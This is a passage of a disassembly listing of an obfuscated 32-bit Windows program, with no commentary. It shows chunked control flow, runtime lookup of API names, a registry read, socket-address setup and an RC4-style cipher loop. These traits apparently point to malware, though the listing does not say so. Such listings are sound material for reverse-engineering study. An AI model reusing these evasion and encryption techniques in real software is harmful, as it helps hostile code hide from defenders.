var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AB26C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009ABCEC SIZE 0000002F BYTES
; FUNCTION CHUNK AT 009AE444 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 009AE674 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AF9C3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009B02B0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009B2884 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B527C SIZE 0000000D BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_9B93EC
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push ecx
pop edi
xor eax, eax
cmp edi, 0Eh
mov [ebp+var_1C], eax
mov esi, edx
mov [ebp+var_4], eax
jb loc_9B2884
jmp off_9B9793
sub_9B3FF8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B403C: ; CODE XREF: sub_9B1F68-6CA8�j
dec ebx
mov [ebp-30h], ebx
lea ecx, [ebx+ebx*2]
lea ecx, [ebp+ecx*4-250h]
mov esi, ecx
lea eax, [eax+ebp-250h]
push dword ptr [esi]
pop edi
mov [eax], edi
mov edi, [esi+4]
mov [eax+4], edi
push dword ptr [esi+8]
pop esi
mov [eax+8], esi
sub eax, eax
mov [ecx], eax
mov [ecx+4], eax
mov [ecx+8], eax
jmp loc_9B5EE5
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B43F4
loc_9B4078: ; CODE XREF: sub_9B43F4-629�j
; DATA XREF: .text:off_9B91D0�o
test ah, 7Ch
jnz loc_9ACEAF
jmp off_9B9414
; END OF FUNCTION CHUNK FOR sub_9B43F4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B4088: ; CODE XREF: sub_9B63D8-5020�j
; DATA XREF: .text:off_9BAA01�o
inc ebx
jmp loc_9B13A8
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AD3EC
loc_9B4093: ; CODE XREF: sub_9AD3EC+3E84�j
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp+0Ch]
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; END OF FUNCTION CHUNK FOR sub_9AD3EC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B40B4: ; CODE XREF: sub_9B1F68-5917�j
call sub_9B2010
or eax, eax
jz loc_9ACD83
jmp off_9B9A29
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B40C8: ; CODE XREF: sub_9B0930-23B1�j
mov edx, [eax+18h]
test edx, edx
jz loc_9B23EF
jmp off_9B9946
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
push edi
xor eax, eax
push 140h
pop ecx
push off_9BA180
pop edi
rep stosd
pop edi
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B40F0: ; CODE XREF: sub_9B63D8-35DC�j
; DATA XREF: .text:off_9BAF2C�o
mov [ebx+ebp-20FBh], dl
push dword_9BCB74
pop eax
push dword ptr [eax+8]
pop ecx
push edx
lea edx, [ebp-2188h]
push edx
lea eax, [ebx+ebp-2118h]
push eax
call dword ptr [ecx+8]
and eax, eax
jz loc_9B4696
jmp loc_9B5844
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9B4124: ; CODE XREF: sub_9AC32C+F6E�j
; DATA XREF: .text:off_9B96F0�o
push 0Ch
pop edi
loc_9B4127: ; CODE XREF: sub_9AC32C+F68�j
; sub_9AC32C+8D12�j
test ebp, ebp
jz loc_9AEF93
jmp loc_9ADE10
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9B4134: ; CODE XREF: sub_9AF25C+4927�j
; DATA XREF: .text:off_9B9F66�o
test byte ptr [ebp-20h], 4
jz loc_9AB9D0
jmp loc_9B3F50
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9B4144: ; CODE XREF: sub_9B649C-A254�j
movzx ecx, word ptr [esi+eax]
mov [ebp+var_20], ecx
add eax, 2
cmp ecx, edx
mov [ebp+var_1C], eax
jz loc_9ACCD8
jmp off_9B96A3
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B4160: ; CODE XREF: sub_9AF030+6717�j
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push edi
push edi
push eax
mov eax, dword_9BBF9C[esi]
push eax
call dword ptr [edx+78h]
push dword_9BCB74
pop ecx
mov edx, [ecx]
push edi
lea eax, [ebp+var_24]
push eax
push ebx
push [ebp+arg_8]
pop ecx
push ecx
mov eax, dword_9BBF9C[esi]
push eax
call dword ptr [edx+70h]
or eax, eax
jz loc_9AC62B
jmp off_9B89BE
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B41A4: ; CODE XREF: sub_9B63D8-ADB1�j
push dword ptr [ebp-2124h]
pop ebx
loc_9B41AB: ; CODE XREF: sub_9B63D8-1620�j
cmp ebx, 23h
jl loc_9AC5C0
jmp loc_9ACB60
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B41BC: ; CODE XREF: sub_9B0930-9�j
; DATA XREF: .text:off_9B9F0B�o
push off_9B8949
mov ecx, [eax]
push ecx
call esi
mov edx, dword_9BCB74
mov ecx, [edx+18h]
mov [ecx+0Ch], eax
push dword_9BCB74
pop edx
mov eax, [edx+18h]
push dword ptr [eax+0Ch]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp loc_9B4D3C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0734
loc_9B41F0: ; CODE XREF: sub_9B0734+1E�j
; DATA XREF: .text:off_9B9703�o
xor ecx, ecx
push esi
pop edx
mov [edx], ecx
mov [edx+4], ecx
mov [edx+8], ecx
mov [edx+0Ch], ecx
mov word ptr [esi], 2
mov [esi+4], ecx
mov eax, dword_9BCB74
mov [esp+8+var_4], 10h
mov ecx, [eax+10h]
push 0
call dword ptr [ecx+8]
lea ecx, [esp+8+var_4]
push ecx
push [esp+0Ch+arg_0]
pop ecx
mov [esi+2], ax
mov edx, dword_9BCB74
mov eax, [edx+10h]
push [esp+0Ch+arg_4]
pop edx
push esi
push 0
push edx
push ecx
push edi
call dword ptr [eax+3Ch]
or eax, eax
jge loc_9B4D48
jmp off_9B8DE3
; END OF FUNCTION CHUNK FOR sub_9B0734
; ---------------------------------------------------------------------------
align 10h
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B4254: ; CODE XREF: sub_9B1F68+391D�j
test al, 10h
jz loc_9B0C90
jmp off_9B88A2
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B327C
loc_9B4264: ; CODE XREF: sub_9B327C-816E�j
; sub_9B327C-58E�j ...
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_9B327C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B426C: ; CODE XREF: sub_9B0930-4C4B�j
push off_9B9FD0
mov eax, [eax]
push eax
call esi
mov ecx, dword_9BCB74
mov edx, [ecx]
mov [edx+5Ch], eax
push dword_9BCB74
pop eax
mov eax, [eax]
push dword ptr [eax+5Ch]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp off_9B8998
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
sub ebx, ebx
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B42AC: ; CODE XREF: sub_9B4950-2FFD�j
push dword_9BCB74
pop ecx
mov edx, [ecx]
push ebx
call dword ptr [edx+60h]
mov ecx, [ebp-10h]
mov large fs:0, ecx
sub eax, eax
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9B42D0: ; CODE XREF: sub_9B03E8+26F7�j
sub esi, esi
jmp loc_9B2B51
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B42D8: ; CODE XREF: sub_9ADAC4+78A�j
; sub_9ADAC4+311F�j
push edi
xor edx, edx
call sub_9B5CDC
test eax, eax
jnz loc_9B4EB8
jmp loc_9AAEC8
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9B42F0: ; CODE XREF: sub_9B5904-93AE�j
; sub_9B5904-1A14�j
; DATA XREF: ...
lea edx, [esi+esi*4]
mov dword_9BEC20[edx*8], 1
; END OF FUNCTION CHUNK FOR sub_9B5904
; START OF FUNCTION CHUNK FOR sub_9AEAAC
loc_9B42FE: ; CODE XREF: sub_9B5904-93B4�j
; sub_9B5904-8975�j ...
push [ebp+var_24]
pop ecx
inc ecx
jmp loc_9AE890
; END OF FUNCTION CHUNK FOR sub_9AEAAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B31A8
loc_9B4308: ; CODE XREF: sub_9B31A8+3C�j
push dword ptr [esi]
pop eax
cmp eax, edi
jz loc_9B1CBF
jmp loc_9B12E0
; END OF FUNCTION CHUNK FOR sub_9B31A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B2830
loc_9B4318: ; CODE XREF: sub_9B2830-1A7�j
sub eax, eax
lea edi, [ebx+8]
mov ax, [edi]
and ah, ah
js loc_9AD190
jmp off_9B92BC
; END OF FUNCTION CHUNK FOR sub_9B2830
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B4330: ; CODE XREF: sub_9B04A8-3CCB�j
mov dword ptr [ebp-4044h], 0
loc_9B433A: ; CODE XREF: sub_9B04A8-3CD1�j
test bl, 1
jz loc_9AE460
jmp off_9B88B7
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B434C: ; CODE XREF: sub_9B04A8-3A66�j
; DATA XREF: .text:off_9BAB52�o
sub eax, eax
mov [ebp-4044h], eax
loc_9B4354: ; CODE XREF: sub_9B04A8+232A�j
mov [ebp-4040h], eax
cmp eax, 3
jge loc_9ADA08
jmp off_9B9151
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B436C: ; CODE XREF: sub_9B1F68-370F�j
lea eax, [edi+edi*2]
shl eax, 2
lea ecx, [eax+ebp-248h]
cmp dword ptr [ecx], 0
jz loc_9B2640
jmp loc_9B0DD8
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9B4388: ; CODE XREF: sub_9B5904-4655�j
; DATA XREF: .text:off_9B8DE7�o
lea ecx, [eax+eax*4]
push dword_9BEC1C[ecx*8]
pop edx
test edx, edx
jnz loc_9AF6B8
jmp off_9B975D
; END OF FUNCTION CHUNK FOR sub_9B5904
; ---------------------------------------------------------------------------
align 4
loc_9B43A4: ; CODE XREF: .text:009B11AD�j
; DATA XREF: .text:off_9B9860�o
pop esi
retn
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AE400
loc_9B43AB: ; CODE XREF: sub_9AE400-22F�j
; sub_9AE400+14FC�j ...
mov [ebp+var_4], 0FFFFFFFFh
push [ebp+var_1C]
pop eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; END OF FUNCTION CHUNK FOR sub_9AE400
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B27D8
loc_9B43CC: ; CODE XREF: sub_9B27D8+D�j
; DATA XREF: .text:off_9B9E5E�o
push edx
pop ecx
mov esi, eax
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
push off_9B8ED2
jmp off_9B8D69
; END OF FUNCTION CHUNK FOR sub_9B27D8
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B43F4 proc near ; CODE XREF: sub_9B3864+84�p
; sub_9B1D80+1F8A�p
; FUNCTION CHUNK AT 009ACEAF SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009AD544 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009AE794 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 009AF974 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 009B04C0 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 009B3B10 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B3DB4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009B4078 SIZE 0000000F BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BA38C
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
mov esi, edx
sub eax, eax
mov [ebp-18h], esp
mov ebx, ecx
mov [ebp-1Ch], eax
mov [ebp-4], eax
push dword ptr [ebp+10h]
pop eax
mov edi, [eax+4]
call sub_9AEDD0
or eax, eax
jnz loc_9ACEAF
jmp off_9BACDC
sub_9B43F4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B4444: ; CODE XREF: sub_9B1A08-2644�j
imul eax, edi
shl eax, 1
push eax
pop ecx
mov eax, 51EB851Fh
imul ecx
sar edx, 5
mov eax, edx
shr eax, 1Fh
lea edx, [eax+edx+0Fh]
loc_9B445E: ; CODE XREF: sub_9B1A08+466B�j
mov [ebp+var_41FC], edx
push [ebp+var_41F4]
pop ecx
push ecx
call sub_9B5CDC
or eax, eax
jnz loc_9ADD8C
jmp loc_9B61E4
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B4480 proc near ; CODE XREF: sub_9AEC20-3501�p
; sub_9B03E8-3FB4�p ...
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = byte ptr -328h
var_224 = byte ptr -224h
var_120 = byte ptr -120h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 009ABC84 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009AE268 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 009B1530 SIZE 00000037 BYTES
; FUNCTION CHUNK AT 009B2890 SIZE 00000039 BYTES
; FUNCTION CHUNK AT 009B32B0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B3DD8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B46E4 SIZE 0000002C BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B9771
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 324h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
mov [ebp+var_18], esp
push edx
pop edi
push ecx
pop ebx
xor esi, esi
mov [ebp+var_334], esi
mov eax, dword_9BCB74
mov ecx, [eax]
push off_9BA97F
call dword ptr [ecx+18h]
mov [ebp+var_4], esi
lea edx, [ebp+var_224]
push edx
push 3
call sub_9B6078
add esp, 8
lea eax, [ebp+var_120]
push eax
push [ebp+arg_0]
pop ecx
push ecx
lea ecx, [ebp+var_328]
call sub_9ABC20
mov edx, dword_9BCB74
mov eax, [edx+0Ch]
lea ecx, [ebp+var_330]
push ecx
push 20019h
push esi
lea edx, [ebp+var_224]
push edx
push 80000001h
call dword ptr [eax+20h]
and eax, eax
jnz loc_9AE288
jmp loc_9B1530
sub_9B4480 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B4530: ; CODE XREF: sub_9B04A8-44FD�j
; DATA XREF: .text:off_9BA60D�o
mov dx, [ebp-402Ah]
cmp dx, [eax+12h]
jz loc_9ADA08
jmp loc_9B27C0
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AD97C
loc_9B454B: ; CODE XREF: sub_9AD97C-17EB�j
; sub_9AD97C+3CC6�j
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, dword_9BCB74
push dword ptr [eax]
pop ecx
push off_9BADC8
call dword ptr [ecx+1Ch]
mov eax, [ebp-20h]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_9AD97C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B457C: ; CODE XREF: sub_9B4950-21C6�j
; DATA XREF: .text:off_9B9388�o
cmp dword_9BEC20[edi], ebx
jz loc_9AEF3A
jmp off_9B8EFC
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B2830
loc_9B4590: ; CODE XREF: sub_9B2830+2324�j
; DATA XREF: .text:off_9B9641�o
push edi
lea edx, [ebx+esi]
push edx
call sub_9AB11C
add esi, edi
mov [ebp-1Ch], esi
mov dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_9B4901
; END OF FUNCTION CHUNK FOR sub_9B2830
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B45AC proc near ; CODE XREF: sub_9B63D8:loc_9AB558�p
; sub_9B2830:loc_9ABEF0�p ...
mov eax, dword_9BCB74
mov ecx, [eax]
push esi
push off_9B8ED2
call dword ptr [ecx+18h]
mov eax, off_9B97DD
call sub_9AD7A4
push dword_9BCB74
pop edx
mov esi, eax
mov eax, [edx]
push off_9B8ED2
call dword ptr [eax+1Ch]
mov eax, esi
pop esi
retn
sub_9B45AC endp
; ---------------------------------------------------------------------------
align 10h
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B57B4
loc_9B45E4: ; CODE XREF: sub_9B57B4-4686�j
push [ebp+var_24]
pop ecx
push ecx
call dword ptr [eax+8]
loc_9B45EC: ; CODE XREF: sub_9B57B4-8FBF�j
push 128h
lea edx, [ebp+var_144]
push edx
push off_9B97DD
pop eax
call sub_9B5100
add esp, 8
jmp loc_9B4BAB
; END OF FUNCTION CHUNK FOR sub_9B57B4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B4610 proc near ; CODE XREF: sub_9B4FD0-7CB6�p
; .text:009B119A�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AB447 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009AE4EC SIZE 0000001C BYTES
; FUNCTION CHUNK AT 009AF228 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B0AC0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009B35CC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009B4ABC SIZE 0000000D BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B90DD
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, ecx
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
push off_9BA623
call dword ptr [ecx+18h]
sub edi, edi
mov [ebp+var_4], edi
loc_9B4654: ; CODE XREF: sub_9B4610-53E0�j
mov [ebp+var_1C], edi
cmp edi, 40h
jge loc_9AB447
jmp off_9BB048
sub_9B4610 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B4668: ; CODE XREF: sub_9B63D8-B72�j
mov edx, [ebp-216Ch]
add edx, 2AC18000h
push dword ptr [ebp-2168h]
pop eax
adc eax, 0FE624E21h
push 0
push 989680h
push eax
push edx
call __aulldiv
mov ecx, [ebp-2154h]
mov [ecx], eax
loc_9B4696: ; CODE XREF: sub_9B63D8-22C1�j
; sub_9B63D8-B78�j
mov byte ptr [ebx+ebp-20FBh], 0Dh
loc_9B469E: ; CODE XREF: sub_9B63D8-7BAB�j
; sub_9B63D8-35E2�j
inc ebx
jmp loc_9AB615
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B46A4: ; CODE XREF: sub_9B1D80-5B51�j
cmp dword ptr [ebp+14h], 11h
jnz loc_9AB0A2
jmp off_9B98EA
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9B46B4: ; CODE XREF: sub_9AF25C-1690�j
push esi
pop edx
call sub_9AF654
or eax, eax
jz loc_9AB8D1
jmp off_9B8DD4
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B46CC proc near ; CODE XREF: sub_9B4950:loc_9AD3C4�p
; sub_9B1A08-442B�p ...
; FUNCTION CHUNK AT 009AC908 SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009AEEC4 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009B2424 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B2C00 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009B5D64 SIZE 0000000B BYTES
push dword_9BEC18
pop eax
test eax, eax
jz loc_9AC908
jmp off_9BA703
sub_9B46CC endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4480
loc_9B46E4: ; CODE XREF: sub_9B4480-11C4�j
mov esi, 1
mov [ebp+var_334], esi
loc_9B46EF: ; CODE XREF: sub_9B4480-1BC3�j
; sub_9B4480-11CA�j
push dword_9BCB74
pop ecx
mov edx, [ecx+0Ch]
mov eax, [ebp+var_330]
push eax
call dword ptr [edx+14h]
loc_9B4703: ; CODE XREF: sub_9B4480-87D6�j
and esi, esi
jz loc_9AEA28
jmp sub_9AD1A4
; END OF FUNCTION CHUNK FOR sub_9B4480
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ABD30
loc_9B4710: ; CODE XREF: sub_9ABD30+A067�j
; DATA XREF: .text:off_9BAA0D�o
lea edi, [eax+2]
loc_9B4713: ; CODE XREF: sub_9ABD30+1889�j
cmp esi, edi
jnz loc_9ABD3E
jmp off_9BA7FA
; END OF FUNCTION CHUNK FOR sub_9ABD30
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B4724 proc near ; CODE XREF: sub_9AB95C+11�j
; FUNCTION CHUNK AT 009B05EC SIZE 00000002 BYTES
push ebx
push edi
mov edi, edx
sub edi, esi
loc_9B472A: ; CODE XREF: sub_9B4724+53�j
mov cl, [eax]
mov bl, [eax+1]
inc cl
mov [eax], cl
movzx ecx, cl
mov dl, [eax+ecx+2]
lea ecx, [eax+ecx+2]
add bl, dl
mov [eax+1], bl
mov dl, bl
mov bl, [ecx]
movzx edx, dl
mov dl, [eax+edx+2]
mov [ecx], dl
movzx ecx, byte ptr [eax+1]
mov [eax+ecx+2], bl
movzx ecx, byte ptr [eax]
movzx edx, byte ptr [eax+1]
mov dl, [eax+edx+2]
add dl, [eax+ecx+2]
mov bl, [esi+edi]
movzx ecx, dl
mov dl, [eax+ecx+2]
xor dl, bl
mov [esi], dl
inc esi
dec ebp
jnz short loc_9B472A
jmp loc_9B05EC
sub_9B4724 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B14CC
loc_9B4783: ; CODE XREF: sub_9B14CC+3E�j
; sub_9B14CC+2811�j
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-1Ch]
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B14CC
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B47A0: ; CODE XREF: sub_9B1A08-4272�j
mov [ebp+var_41E0], 0
jmp loc_9AF398
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B47B0: ; CODE XREF: sub_9B4950-3C8�j
; DATA XREF: .text:off_9B8EFC�o
cmp dword_9BEC24[edi], ebx
jnz loc_9B0D64
jmp loc_9B2A4C
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9B47C4: ; CODE XREF: sub_9ACEE8+5452�j
call sub_9B227C
sub eax, [ebp-0B8h]
cmp eax, 1Eh
jbe loc_9B34B9
jmp loc_9B2C9C
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 10h
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9B47E8: ; CODE XREF: sub_9B5904-896F�j
or esi, 0FFFFFFFFh
mov [ebp-20h], esi
xor ecx, ecx
loc_9B47F0: ; CODE XREF: sub_9B5904-A76B�j
mov [ebp-1Ch], ecx
cmp ecx, 20h
jge loc_9B3EED
jmp off_9BA83C
; END OF FUNCTION CHUNK FOR sub_9B5904
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B480C: ; CODE XREF: sub_9B0930-4F8E�j
push off_9B955D
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx]
pop ecx
mov [ecx+50h], eax
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
mov ecx, [eax+50h]
test ecx, ecx
jz loc_9B23EF
jmp off_9BAB16
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B4840: ; CODE XREF: sub_9B1F68-1D7A�j
; DATA XREF: .text:off_9B8D3E�o
lea edi, [edi+edi*2]
shl edi, 2
lea esi, [edi+ebp-248h]
mov [ebp-50h], esi
push dword ptr [esi]
pop eax
test eax, eax
jz loc_9B586C
jmp loc_9AB6E4
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B4860: ; CODE XREF: sub_9B63D8-8D95�j
; DATA XREF: .text:off_9B8D10�o
cmp dword ptr [ebp-2124h], 0FFFFFFFFh
jz loc_9AF94B
jmp loc_9AF248
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B4874: ; CODE XREF: sub_9B1F68-51C3�j
imul eax, esi
shl eax, 1
push eax
pop ecx
push 51EB851Fh
pop eax
imul ecx
sar edx, 5
push edx
pop eax
shr eax, 1Fh
lea esi, [eax+edx+1]
jmp off_9B944D
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B4898: ; CODE XREF: sub_9B0930-8FB�j
; DATA XREF: .text:off_9B8DB2�o
push offset aCreateeventa ; "CreateEventA"
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
mov ecx, [edx]
mov [ecx+20h], eax
push dword_9BCB74
pop edx
mov eax, [edx]
push dword ptr [eax+20h]
pop ecx
test ecx, ecx
